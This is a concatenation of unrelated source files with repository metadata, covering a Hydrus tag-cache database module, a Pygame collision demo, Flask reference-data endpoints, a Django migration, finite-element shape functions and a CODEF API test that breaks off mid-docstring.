counts_cache_changes.append( ( tag_id, current_delta, pending_delta ) )
if len( counts_cache_changes ) > 0:
self.modules_mappings_counts_update.AddCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
def AddMappings( self, tag_service_id, tag_id, hash_ids, filtered_hashes_generator: FilteredHashesGenerator ):
for ( file_service_id, filtered_hash_ids ) in filtered_hashes_generator.IterateHashes( hash_ids ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
# we have to interleave this into the iterator so that if two siblings with the same ideal are pend->currented at once, we remain logic consistent for soletag lookups!
self.modules_mappings_cache_specific_display.RescindPendingMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
self._ExecuteMany( 'DELETE FROM ' + cache_pending_mappings_table_name + ' WHERE hash_id = ? AND tag_id = ?;', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
num_pending_rescinded = self._GetRowCount()
#
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_current_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
num_current_inserted = self._GetRowCount()
#
self._ExecuteMany( 'DELETE FROM ' + cache_deleted_mappings_table_name + ' WHERE hash_id = ? AND tag_id = ?;', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
if num_current_inserted > 0:
counts_cache_changes = [ ( tag_id, num_current_inserted, 0 ) ]
self.modules_mappings_counts_update.AddCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
if num_pending_rescinded > 0:
counts_cache_changes = [ ( tag_id, 0, num_pending_rescinded ) ]
self.modules_mappings_counts_update.ReduceCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
self.modules_mappings_cache_specific_display.AddMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
def Clear( self, file_service_id, tag_service_id, keep_pending = False ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
self._Execute( 'DELETE FROM {};'.format( cache_current_mappings_table_name ) )
self._Execute( 'DELETE FROM {};'.format( cache_deleted_mappings_table_name ) )
if not keep_pending:
self._Execute( 'DELETE FROM {};'.format( cache_pending_mappings_table_name ) )
self.modules_mappings_counts.ClearCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, keep_pending = keep_pending )
self.modules_mappings_cache_specific_display.Clear( file_service_id, tag_service_id, keep_pending = keep_pending )
def CreateTables( self, file_service_id, tag_service_id ):
table_generation_dict = self._GetServiceTableGenerationDictSingle( file_service_id, tag_service_id )
for ( table_name, ( create_query_without_name, version_added ) ) in table_generation_dict.items():
self._CreateTable( create_query_without_name, table_name )
self.modules_mappings_counts.CreateTables( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id )
def Drop( self, file_service_id, tag_service_id ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
self.modules_db_maintenance.DeferredDropTable( cache_current_mappings_table_name )
self.modules_db_maintenance.DeferredDropTable( cache_deleted_mappings_table_name )
self.modules_db_maintenance.DeferredDropTable( cache_pending_mappings_table_name )
self.modules_mappings_counts.DropTables( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id )
self.modules_mappings_cache_specific_display.Drop( file_service_id, tag_service_id )
def DeleteFiles( self, file_service_id, tag_service_id, hash_ids, hash_id_table_name ):
self.modules_mappings_cache_specific_display.DeleteFiles( file_service_id, tag_service_id, hash_ids, hash_id_table_name )
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
# temp hashes to mappings
deleted_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_id_table_name, cache_deleted_mappings_table_name ) ).fetchall()
if len( deleted_mapping_ids_raw ) > 0:
self._ExecuteMany( 'DELETE FROM {} WHERE tag_id = ? AND hash_id = ?;'.format( cache_deleted_mappings_table_name ), deleted_mapping_ids_raw )
# temp hashes to mappings
current_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_id_table_name, cache_current_mappings_table_name ) ).fetchall()
current_mapping_ids_dict = HydrusData.BuildKeyToSetDict( current_mapping_ids_raw )
# temp hashes to mappings
pending_mapping_ids_raw = self._Execute( 'SELECT tag_id, hash_id FROM {} CROSS JOIN {} USING ( hash_id );'.format( hash_id_table_name, cache_pending_mappings_table_name ) ).fetchall()
pending_mapping_ids_dict = HydrusData.BuildKeyToSetDict( pending_mapping_ids_raw )
all_ids_seen = set( current_mapping_ids_dict.keys() )
all_ids_seen.update( pending_mapping_ids_dict.keys() )
counts_cache_changes = []
for tag_id in all_ids_seen:
current_hash_ids = current_mapping_ids_dict[ tag_id ]
num_current = len( current_hash_ids )
#
pending_hash_ids = pending_mapping_ids_dict[ tag_id ]
num_pending = len( pending_hash_ids )
counts_cache_changes.append( ( tag_id, num_current, num_pending ) )
self._ExecuteMany( 'DELETE FROM ' + cache_current_mappings_table_name + ' WHERE hash_id = ?;', ( ( hash_id, ) for hash_id in hash_ids ) )
self._ExecuteMany( 'DELETE FROM ' + cache_pending_mappings_table_name + ' WHERE hash_id = ?;', ( ( hash_id, ) for hash_id in hash_ids ) )
if len( counts_cache_changes ) > 0:
self.modules_mappings_counts_update.ReduceCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
def DeleteMappings( self, tag_service_id, tag_id, hash_ids, filtered_hashes_generator: FilteredHashesGenerator ):
for ( file_service_id, filtered_hash_ids ) in filtered_hashes_generator.IterateHashes( hash_ids ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
self.modules_mappings_cache_specific_display.DeleteMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
self._ExecuteMany( 'DELETE FROM ' + cache_current_mappings_table_name + ' WHERE hash_id = ? AND tag_id = ?;', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
num_deleted = self._GetRowCount()
#
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_deleted_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
if num_deleted > 0:
counts_cache_changes = [ ( tag_id, num_deleted, 0 ) ]
self.modules_mappings_counts_update.ReduceCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
def Generate( self, file_service_id, tag_service_id ):
self.CreateTables( file_service_id, tag_service_id )
#
hash_ids = self.modules_files_storage.GetCurrentHashIdsList( file_service_id )
BLOCK_SIZE = 10000
for ( i, block_of_hash_ids ) in enumerate( HydrusLists.SplitListIntoChunks( hash_ids, BLOCK_SIZE ) ):
with self._MakeTemporaryIntegerTable( block_of_hash_ids, 'hash_id' ) as temp_hash_id_table_name:
self.AddFiles( file_service_id, tag_service_id, block_of_hash_ids, temp_hash_id_table_name )
index_generation_dict = self._GetServiceIndexGenerationDictSingle( file_service_id, tag_service_id )
for ( table_name, columns, unique, version_added ) in self._FlattenIndexGenerationDict( index_generation_dict ):
self._CreateIndex( table_name, columns, unique = unique )
self.modules_db_maintenance.TouchAnalyzeNewTables()
self.modules_mappings_cache_specific_display.Generate( file_service_id, tag_service_id, populate_from_storage = True )
def GetFilteredHashesGenerator( self, file_service_ids, tag_service_id, hash_ids ) -> FilteredHashesGenerator:
file_service_ids_to_valid_hash_ids = collections.defaultdict( set )
with self._MakeTemporaryIntegerTable( hash_ids, 'hash_id' ) as temp_table_name:
for file_service_id in file_service_ids:
table_join = self.modules_files_storage.GetTableJoinLimitedByFileDomain( file_service_id, temp_table_name, HC.CONTENT_STATUS_CURRENT )
valid_hash_ids = self._STS( self._Execute( 'SELECT hash_id FROM {};'.format( table_join ) ) )
file_service_ids_to_valid_hash_ids[ file_service_id ] = valid_hash_ids
return FilteredHashesGenerator( file_service_ids_to_valid_hash_ids )
def GetFilteredMappingsGenerator( self, file_service_ids, tag_service_id, mappings_ids ) -> FilteredMappingsGenerator:
all_hash_ids = set( itertools.chain.from_iterable( ( hash_ids for ( tag_id, hash_ids ) in mappings_ids ) ) )
file_service_ids_to_valid_hash_ids = collections.defaultdict( set )
with self._MakeTemporaryIntegerTable( all_hash_ids, 'hash_id' ) as temp_table_name:
for file_service_id in file_service_ids:
table_join = self.modules_files_storage.GetTableJoinLimitedByFileDomain( file_service_id, temp_table_name, HC.CONTENT_STATUS_CURRENT )
valid_hash_ids = self._STS( self._Execute( 'SELECT hash_id FROM {};'.format( table_join ) ) )
file_service_ids_to_valid_hash_ids[ file_service_id ] = valid_hash_ids
return FilteredMappingsGenerator( file_service_ids_to_valid_hash_ids, mappings_ids )
def GetMissingServicePairs( self ):
return self._missing_tag_service_pairs
def GetTablesAndColumnsThatUseDefinitions( self, content_type: int ) -> typing.List[ typing.Tuple[ str, str ] ]:
tables_and_columns = []
if content_type == HC.CONTENT_TYPE_TAG:
table_dict = self._GetServicesTableGenerationDict()
for table_name in table_dict.keys():
tables_and_columns.append( ( table_name, 'tag_id' ) )
elif content_type == HC.CONTENT_TYPE_HASH:
table_dict = self._GetServicesTableGenerationDict()
for table_name in table_dict.keys():
tables_and_columns.append( ( table_name, 'hash_id' ) )
return tables_and_columns
def PendMappings( self, tag_service_id, tag_id, hash_ids, filtered_hashes_generator: FilteredHashesGenerator ):
for ( file_service_id, filtered_hash_ids ) in filtered_hashes_generator.IterateHashes( hash_ids ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
self._ExecuteMany( 'INSERT OR IGNORE INTO ' + cache_pending_mappings_table_name + ' ( hash_id, tag_id ) VALUES ( ?, ? );', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
num_added = self._GetRowCount()
if num_added > 0:
counts_cache_changes = [ ( tag_id, 0, num_added ) ]
self.modules_mappings_counts_update.AddCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
self.modules_mappings_cache_specific_display.PendMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
def RegeneratePending( self, file_service_id, tag_service_id, status_hook = None ):
( current_mappings_table_name, deleted_mappings_table_name, pending_mappings_table_name, petitioned_mappings_table_name ) = ClientDBMappingsStorage.GenerateMappingsTableNames( tag_service_id )
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
if status_hook is not None:
message = 'clearing old specific data'
status_hook( message )
all_pending_storage_tag_ids = self._STS( self._Execute( 'SELECT DISTINCT tag_id FROM {};'.format( pending_mappings_table_name ) ) )
self.modules_mappings_counts.ClearCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, keep_current = True )
self._Execute( 'DELETE FROM {};'.format( cache_pending_mappings_table_name ) )
counts_cache_changes = []
num_to_do = len( all_pending_storage_tag_ids )
select_table_join = self.modules_files_storage.GetTableJoinLimitedByFileDomain( file_service_id, pending_mappings_table_name, HC.CONTENT_STATUS_CURRENT )
for ( i, storage_tag_id ) in enumerate( all_pending_storage_tag_ids ):
if i % 100 == 0 and status_hook is not None:
message = 'regenerating pending tags {}'.format( HydrusData.ConvertValueRangeToPrettyString( i + 1, num_to_do ) )
status_hook( message )
self._Execute( 'INSERT OR IGNORE INTO {} ( tag_id, hash_id ) SELECT tag_id, hash_id FROM {} WHERE tag_id = ?;'.format( cache_pending_mappings_table_name, select_table_join ), ( storage_tag_id, ) )
pending_delta = self._GetRowCount()
counts_cache_changes.append( ( storage_tag_id, 0, pending_delta ) )
self.modules_mappings_counts_update.AddCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
self.modules_mappings_cache_specific_display.RegeneratePending( file_service_id, tag_service_id, status_hook = status_hook )
def RescindPendingMappings( self, tag_service_id, tag_id, hash_ids, filtered_hashes_generator: FilteredHashesGenerator ):
for ( file_service_id, filtered_hash_ids ) in filtered_hashes_generator.IterateHashes( hash_ids ):
( cache_current_mappings_table_name, cache_deleted_mappings_table_name, cache_pending_mappings_table_name ) = ClientDBMappingsStorage.GenerateSpecificMappingsCacheTableNames( file_service_id, tag_service_id )
ac_counts = collections.Counter()
self.modules_mappings_cache_specific_display.RescindPendingMappings( file_service_id, tag_service_id, tag_id, filtered_hash_ids )
self._ExecuteMany( 'DELETE FROM ' + cache_pending_mappings_table_name + ' WHERE hash_id = ? AND tag_id = ?;', ( ( hash_id, tag_id ) for hash_id in filtered_hash_ids ) )
num_deleted = self._GetRowCount()
if num_deleted > 0:
counts_cache_changes = [ ( tag_id, 0, num_deleted ) ]
self.modules_mappings_counts_update.ReduceCounts( ClientTags.TAG_DISPLAY_STORAGE, file_service_id, tag_service_id, counts_cache_changes )
| [
"hydrus.admin@gmail.com"
] | hydrus.admin@gmail.com |
078f1c67f72061d6446f7ee3438d940e228c5efe | fd3b3d5c5adfd0599f158599d7d64857dbb54f31 | /Python_Work/c14Work/walls.py | 2c7a1cfb5f71a403ceed46ac95506a75edd03c28 | [] | no_license | BySRenovatio/Projects-in-Python | 3776ef50be956c85014312295b30df164b58ff56 | a29a1988dfb95b5d3491476e84d1c73c1b905f6f | refs/heads/master | 2020-03-21T21:33:41.288152 | 2018-06-28T21:30:55 | 2018-06-28T21:30:55 | 139,070,285 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,233 | py | """
Sample Python/Pygame Programs
Simpson College Computer Science
http://programarcadegames.com/
http://simpson.edu/computer-science/
From:
http://programarcadegames.com/python_examples/f.php?file=move_with_walls_example
Explanation video: http://youtu.be/8IRyt7ft7zg
Part of a series:
http://programarcadegames.com/python_examples/f.php?file=move_with_walls_example.py
http://programarcadegames.com/python_examples/f.php?file=maze_runner.py
http://programarcadegames.com/python_examples/f.php?file=platform_jumper.py
http://programarcadegames.com/python_examples/f.php?file=platform_scroller.py
http://programarcadegames.com/python_examples/f.php?file=platform_moving.py
http://programarcadegames.com/python_examples/sprite_sheets/
"""
import pygame
"""
Global constants
"""
# Colors
BLACK = ( 0, 0, 0)
WHITE = ( 255, 255, 255)
BLUE = ( 0, 0, 255)
# Screen dimensions
SCREEN_WIDTH = 800
SCREEN_HEIGHT = 600
# This class represents the bar at the bottom that the player controls
class Player(pygame.sprite.Sprite):
""" This class represents the bar at the bottom that the player controls. """
# Set speed vector
change_x = 0
change_y = 0
walls = None
# Constructor function
def __init__(self, x, y):
# Call the parent's constructor
pygame.sprite.Sprite.__init__(self)
# Set height, width
self.image = pygame.Surface([15, 15])
self.image.fill(WHITE)
# Make our top-left corner the passed-in location.
self.rect = self.image.get_rect()
self.rect.y = y
self.rect.x = x
def changespeed(self, x, y):
""" Change the speed of the player. """
self.change_x += x
self.change_y += y
def update(self):
""" Update the player position. """
# Move left/right
self.rect.x += self.change_x
# Did this update cause us to hit a wall?
block_hit_list = pygame.sprite.spritecollide(self, self.walls, False)
for block in block_hit_list:
# If we are moving right, set our right side to the left side of the item we hit
if self.change_x > 0:
self.rect.right = block.rect.left
else:
# Otherwise if we are moving left, do the opposite.
self.rect.left = block.rect.right
# Move up/down
self.rect.y += self.change_y
# Check and see if we hit anything
block_hit_list = pygame.sprite.spritecollide(self, self.walls, False)
for block in block_hit_list:
# Reset our position based on the top/bottom of the object.
if self.change_y > 0:
self.rect.bottom = block.rect.top
else:
self.rect.top = block.rect.bottom
class Wall(pygame.sprite.Sprite):
""" Wall the player can run into. """
def __init__(self, x, y, width, height):
""" Constructor for the wall that the player can run into. """
# Call the parent's constructor
pygame.sprite.Sprite.__init__(self)
# Make a blue wall, of the size specified in the parameters
self.image = pygame.Surface([width, height])
self.image.fill(BLUE)
# Make our top-left corner the passed-in location.
self.rect = self.image.get_rect()
self.rect.y = y
self.rect.x = x
# Call this function so the Pygame library can initialize itself
pygame.init()
# Create an 800x600 sized screen
screen = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT])
# Set the title of the window
pygame.display.set_caption('Test')
# List to hold all the sprites
all_sprite_list = pygame.sprite.Group()
# Make the walls. (x_pos, y_pos, width, height)
wall_list = pygame.sprite.Group()
wall = Wall(0, 0, 10, 600)
wall_list.add(wall)
all_sprite_list.add(wall)
wall = Wall(10, 0, 790, 10)
wall_list.add(wall)
all_sprite_list.add(wall)
wall = Wall(10, 200, 100, 10)
wall_list.add(wall)
all_sprite_list.add(wall)
# Create the player paddle object
player = Player(50, 50)
player.walls = wall_list
all_sprite_list.add(player)
clock = pygame.time.Clock()
done = False
while not done:
for event in pygame.event.get():
if event.type == pygame.QUIT:
done = True
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
player.changespeed(-3, 0)
elif event.key == pygame.K_RIGHT:
player.changespeed(3, 0)
elif event.key == pygame.K_UP:
player.changespeed(0, -3)
elif event.key == pygame.K_DOWN:
player.changespeed(0, 3)
elif event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT:
player.changespeed(3, 0)
elif event.key == pygame.K_RIGHT:
player.changespeed(-3, 0)
elif event.key == pygame.K_UP:
player.changespeed(0, 3)
elif event.key == pygame.K_DOWN:
player.changespeed(0, -3)
all_sprite_list.update()
screen.fill(BLACK)
all_sprite_list.draw(screen)
pygame.display.flip()
clock.tick(60)
pygame.quit() | [
"40674806+BySRenovatio@users.noreply.github.com"
] | 40674806+BySRenovatio@users.noreply.github.com |
0a97db3af87cc1ef1bac4964125abf2be116299f | 5fac3f1dbac1d859f17b41dc243f146ef1db3e91 | /models/model.py | 1fc9f95333a3bc67c6290dfc56625a5d7b8fe1df | [] | no_license | ftelechea/apiDatosRef | 63c0afca0f23acf20008ba69a66232d4edc39e2a | 3d281fd47e8ec84f83c11dc6cd8d4ee108af36e4 | refs/heads/master | 2022-12-15T09:57:27.459755 | 2020-09-04T11:10:50 | 2020-09-04T11:10:50 | 292,270,644 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,734 | py | from flask_restful import Resource
import models.database_command as db
class Paises(Resource):
def get(self):
"""
Retorna la lista de Paรญses
Codificaciรณn de paรญses de acuerdo a la norma ISO 3166-1:2007
---
tags:
- paises
responses:
200:
description: lista de paรญses
schema:
id: Paises
properties:
cod_pais:
type: string
description: Cรณdigo de Paรญs
cod_alfa_2:
type: string
description: Cรณdigo alfanumรฉrico de 2 caracteres
cod_alfa_3:
type: string
description: Cรณdigo alfanumรฉrico de 3 caracteres
nombre_pais:
type: string
description: Nombre de Paรญs
"""
#crear conexiรณn a la base
my_data_access = db.DatabaseCommand()
select_Query = ("select "
"cod_pais, "
"cod_alfa_2, "
"cod_alfa_3, "
"nombre_pais "
"from dat_referenciales.cod_paises "
"order by nombre_pais")
#ejecutar sentencia sql
result = my_data_access.execute_sql_dataset(select_Query)
return result
class Departamentos(Resource):
def get(self):
"""
Retorna la lista de Departamentos
Codificaciรณn de acuerdo a la norma ISO 3166-2:2007
---
tags:
- departamentos
responses:
200:
description: lista de departamentos
schema:
id: Departamentos
properties:
cod_departamento:
type: string
description: Cรณdigo de Departamanto
nombre_departamento:
type: string
description: Nombre de Departamanto
"""
#crear conexiรณn a la base
my_data_access = db.DatabaseCommand()
select_Query = ("select "
"cod_departamento, "
"nombre_departamento "
"from dat_referenciales.cod_departamentos "
"order by nombre_departamento")
#ejecutar sentencia sql
result = my_data_access.execute_sql_dataset(select_Query)
return result
class Sexos(Resource):
def get(self):
"""
Retorna la lista de Sexos
Codificaciรณn del sexo entendido como โel conjunto de caracterรญsticas biolรณgicas que definen al espectro de humanos como hembras y machos" (Organizaciรณn Mundial de la Salud).
---
tags:
- sexos
responses:
200:
description: lista de sexos
schema:
id: Sexos
properties:
cod_sexo:
type: integer
description: Cรณdigo de Sexo
nombre_sexo:
type: string
description: Nombre de Sexo
descripcion_sexo:
type: string
description: Descripciรณn de Sexo
"""
#crear conexiรณn a la base
my_data_access = db.DatabaseCommand()
select_Query = ("select "
"cod_sexo, "
"nombre_sexo, "
"descripcion_sexo "
"from dat_referenciales.cod_sexos "
"order by cod_sexo")
#ejecutar sentencia sql
result = my_data_access.execute_sql_dataset(select_Query)
return result
class Generos(Resource):
def get(self):
"""
Retorna la lista de Gรฉneros
Codificaciรณn del gรฉnero entendido como la construcciรณn cultural referida a la diferencia sexual de los individuos de la especie humana
---
tags:
- gรฉneros
responses:
200:
description: lista de gรฉneros
schema:
id: Generos
properties:
cod_genero:
type: integer
description: Cรณdigo de Gรฉnero
nombre_genero:
type: string
description: Nombre de Gรฉnero
descripcion_genero:
type: string
description: Descripciรณn de Gรฉnero
"""
#crear conexiรณn a la base
my_data_access = db.DatabaseCommand()
select_Query = ("select "
"cod_genero, "
"nombre_genero, "
"descripcion_genero "
"from dat_referenciales.cod_generos "
"order by cod_genero")
#ejecutar sentencia sql
result = my_data_access.execute_sql_dataset(select_Query)
return result
class EstadosCiviles(Resource):
def get(self):
"""
Retorna la lista de Estados Civiles
Codificaciรณn del estado civil entendido como la situaciรณn de las personas determinada por sus relaciones de familia, provenientes del matrimonio, que establece ciertos derechos y deberes
---
tags:
- estados civiles
responses:
200:
description: lista de estados civiles
schema:
id: EstadosCiviles
properties:
cod_estado_civil:
type: string
description: Cรณdigo de Estado Civil
nombre_estado_civil:
type: string
description: Nombre de Estado Civil
descripcion_estado_civil:
type: string
description: Descripciรณn de Estado Civil
"""
#crear conexiรณn a la base
my_data_access = db.DatabaseCommand()
select_Query = ("select "
"cod_estado_civil, "
"nombre_estado_civil, "
"descripcion_estado_civil "
"from dat_referenciales.cod_estados_civiles "
"order by nombre_estado_civil")
#ejecutar sentencia sql
result = my_data_access.execute_sql_dataset(select_Query)
return result
class TiposDocumentosPersona(Resource):
def get(self):
"""
Retorna la lista de Tipos de Documentos que identifican Personas
Codificaciรณn segรบn adaptaciรณn de la UNAOID para el estรกndar ICAO
---
tags:
- tipos documentos persona
responses:
200:
description: lista de tipos de documento
schema:
id: TiposDocumentosPersona
properties:
cod_tipo_documento:
type: integer
description: Cรณdigo de Tipo de Documento
descripcion_tipo_documento:
type: string
description: Descripciรณn del Tipo de Documento
"""
#crear conexiรณn a la base
my_data_access = db.DatabaseCommand()
select_Query = ("select "
"cod_tipo_documento, "
"descripcion_tipo_documento "
"from dat_referenciales.cod_tipos_documentos "
"order by cod_tipo_documento")
#ejecutar sentencia sql
result = my_data_access.execute_sql_dataset(select_Query)
return result | [
"noreply@github.com"
] | ftelechea.noreply@github.com |
7101f41dbc95bab298f836e2d61dd7d024040609 | f33a971e5c13c724712c97f6d13e585f8526c4a0 | /server/Test.py | 140e2a53d5e65fe739c7026c80bf1fb468d2e0a8 | [] | no_license | Thermomiplex/Thermominator | 7bec8a44eb363001d383c2dc38715ba461e992f7 | 5b6ffa4ed5247655781011c7e0aeeabfc30320b6 | refs/heads/master | 2021-03-12T23:02:35.682883 | 2013-11-29T16:09:23 | 2013-11-29T16:09:23 | 13,584,401 | 1 | 1 | null | 2013-10-24T13:20:37 | 2013-10-15T08:23:06 | Java | UTF-8 | Python | false | false | 160 | py | from py4j.java_gateway import JavaGateway
gateway = JavaGateway()
java_object = gateway.jvm.soton.Test()
other_object = java_object.hello()
print other_object
| [
"amir@amir-laptop.(none)"
] | amir@amir-laptop.(none) |
cfe01345e37aadfec5a5a2ccb5e0ad6c4a9df927 | 9d278285f2bc899ac93ec887b1c31880ed39bf56 | /ondoc/doctor/migrations/0192_auto_20190125_1514.py | 3779ca4d7f242aa5bd1e5ad30a90d32209c5bc7d | [] | no_license | ronit29/docprime | 945c21f8787387b99e4916cb3ba1618bc2a85034 | 60d4caf6c52a8b70174a1f654bc792d825ba1054 | refs/heads/master | 2023-04-01T14:54:10.811765 | 2020-04-07T18:57:34 | 2020-04-07T18:57:34 | 353,953,576 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | # Generated by Django 2.0.5 on 2019-01-25 09:44
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('doctor', '0191_auto_20190124_1845'),
]
operations = [
migrations.AlterField(
model_name='cancellationreason',
name='type',
field=models.PositiveSmallIntegerField(blank=True, default=None, null=True),
),
]
| [
"shashanks@policybazaar.com"
] | shashanks@policybazaar.com |
36710a7d12616b5644f99cb4df293b84763d2c31 | fcd5be464ccb9005f0f656a2405c1e2d05420d3c | /triangular elements shape functions 2D.py | c63f7eaa816281ee435611a58728ba9d149067c4 | [] | no_license | patozavala/finite-elements-codes | ef023fab91c1c163209150fb4d11e380f2cbd20a | df0f265fb4c8d1836728ea4c2d85e988e6c4e547 | refs/heads/main | 2023-04-05T03:15:57.168629 | 2021-04-13T03:17:52 | 2021-04-13T03:17:52 | 193,142,447 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,995 | py | import numpy as np
def gauss_quadrature_triangle(k):
"""
this routine gives the quadrature points and weights of quadrature to
integrate numerically a polynomial of order "k".
:param k: polynomial order to approximate
:return: xi : coordinates of quad points
w : value of quad weight
"""
if k == 1:
xi = np.array([[1 / 3, 1 / 3]])
w = np.array([0.5])
elif k == 2:
xi = np.array([[2 / 3., 1. / 6.], [1. / 6., 2. / 3.], [1. / 6., 1. / 6.]])
w = np.array([1. / 6., 1. / 6., 1. / 6.])
elif k == 3:
xi = np.array([[1. / 3., 1. / 3.], [3. / 5., 1. / 5.], [1. / 5., 3. / 5.], [1. / 5., 1. / 5.]])
w = np.array([-27. / 96., 25. / 96., 25. / 96., 25. / 96.])
return xi, w
def p1_shape_function(triangle, xi):
"""
this routine evaluates the shape functions and their spatial gradients
at the quadrature points in the iso-parametric configuration for P1-elements
:param triangle: nodes of the of the elements in non-iso parametric configuration
:param xi: point of quadrature
:return: N : values โโof the function as assessed at the quad point.
DN : gradient of N
J : Jacobian
"""
xi1, xi2 = xi
xi3 = 1 - xi1 - xi2
N1hat = xi1
N2hat = xi2
N3hat = xi3
N = np.vstack((N1hat, N2hat, N3hat))
nabla_Nhat = np.array([[1., 0., -1.], [0., 1., -1.]])
J = np.dot(triangle, nabla_Nhat.T)
nabla_N = np.dot(np.linalg.inv(J.T), nabla_Nhat)
return N, nabla_N, J
def p2_shape_function(triangle, xi):
"""
this routine evaluates the shape functions and their spatial gradients
at the quadrature points in the iso-parametric configuration for P2-elements
:param triangle: nodes of the of the elements in non-iso parametric configuration
:param xi: point of quadrature
:return: N : values of the function as assessed at the quad point.
nabla_N : gradient of N
J : Jacobian
"""
xi1, xi2 = xi
xi3 = 1 - xi1 - xi2
n1hat = xi1 * (2. * xi1 - 1.)
n2hat = xi2 * (2. * xi2 - 1.)
n3hat = xi3 * (2. * xi3 - 1.)
n4hat = 4. * xi1 * xi2
n5hat = 4. * xi2 * xi3
n6hat = 4. * xi1 * xi3
N = np.vstack((n1hat, n2hat, n3hat, n4hat, n5hat, n6hat))
nabla_Nhat = np.array([[4. * xi1 - 1., 0., -(4. * xi3 - 1.), 4. * xi2, - 4. * xi2, 4. * (xi3 - xi1)],
[0., 4. * xi2 - 1., -(4. * xi3 - 1.), 4. * xi1, 4. * (xi3 - xi2), - 4. * xi1]])
J = np.dot(triangle, nabla_Nhat.T)
nabla_N = np.dot(np.linalg.inv(J.T), nabla_Nhat)
return N, nabla_N, J
"""
Execution
"""
n = 2
xi = gauss_quadrature_triangle(n)[0][0]
x_p1 = np.array([[0, 0], [0, 3], [5, 0]]).T
x_p2 = np.array([[0, 0], [0, 1.5], [2.5, 0], [2.5, 1.5], [0, 3], [5, 0]]).T
print(p1_shape_function(triangle=x_p1, xi=xi))
print(p2_shape_function(triangle=x_p2, xi=xi))
| [
"noreply@github.com"
] | patozavala.noreply@github.com |
71f8ffebaa5401937cf79dbf6d5fb29112bac31b | 964092cfec6190072ea82d698ff0e0fe77fd9e24 | /tests/test_common.py | 3bba840560b16e5d2e69b6099da72f13f8c506a3 | [] | permissive | esanzy87/codef-python | 2ce851d870be8c04d97a7a3e28169cef2b8f877b | cd60a3b58781937c17f14732fb0dd546186c4cc8 | refs/heads/master | 2021-05-22T13:19:14.023617 | 2020-04-22T06:36:14 | 2020-04-22T06:36:14 | 252,943,726 | 1 | 0 | MIT | 2020-04-22T06:36:16 | 2020-04-04T08:09:44 | Python | UTF-8 | Python | false | false | 968 | py | import unittest
from . import invoker_factory
class CommonTestCase(unittest.TestCase):
"""
๊ด๋ฆฌ๋จ์ ํด๋นํ๋ ๊ณตํต API ํ
์คํธ์ผ์ด์ค
"""
@classmethod
def setUpClass(cls):
cls.invoker = invoker_factory.get_invoker()
cls.connected_id = '8OLsIxnamncje8lkUuKax-O'
def test_fetch_connected_id_list(self):
"""
์ ์ฒด ์ปค๋ฅํฐ๋ ์์ด๋ ๋ชฉ๋ก ์กฐํ
:return:
"""
response_body = self.invoker.fetch_connected_id_list()
self.assertEqual(response_body['result']['code'], 'CF-00000')
def test_fetch_organization_list(self):
"""
